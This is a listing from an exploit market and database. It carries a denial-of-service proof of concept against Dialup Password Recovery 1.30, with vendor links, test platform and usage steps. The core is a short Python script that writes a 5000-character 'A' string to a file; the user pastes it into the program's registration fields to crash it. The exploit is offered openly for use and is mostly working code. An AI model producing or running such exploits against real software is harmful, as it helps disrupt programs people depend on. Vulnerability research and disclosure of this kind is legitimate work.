[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Top Password Software Dialup Password Recovery 1.30 - Denial of Service Exploit

Author
antonio
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-33800
Category
dos / poc
Date add
13-01-2020
Platform
windows
# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/DialupPRSetup.exe
# Version: 1.30
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt into the
# User Name /  Registration Code input fields.

#!/usr/bin/python

poc =3D "A"*5000
file =3D open("poc.txt","w")
file.write(poc)
file.close()

#  0day.today [2024-09-28]  #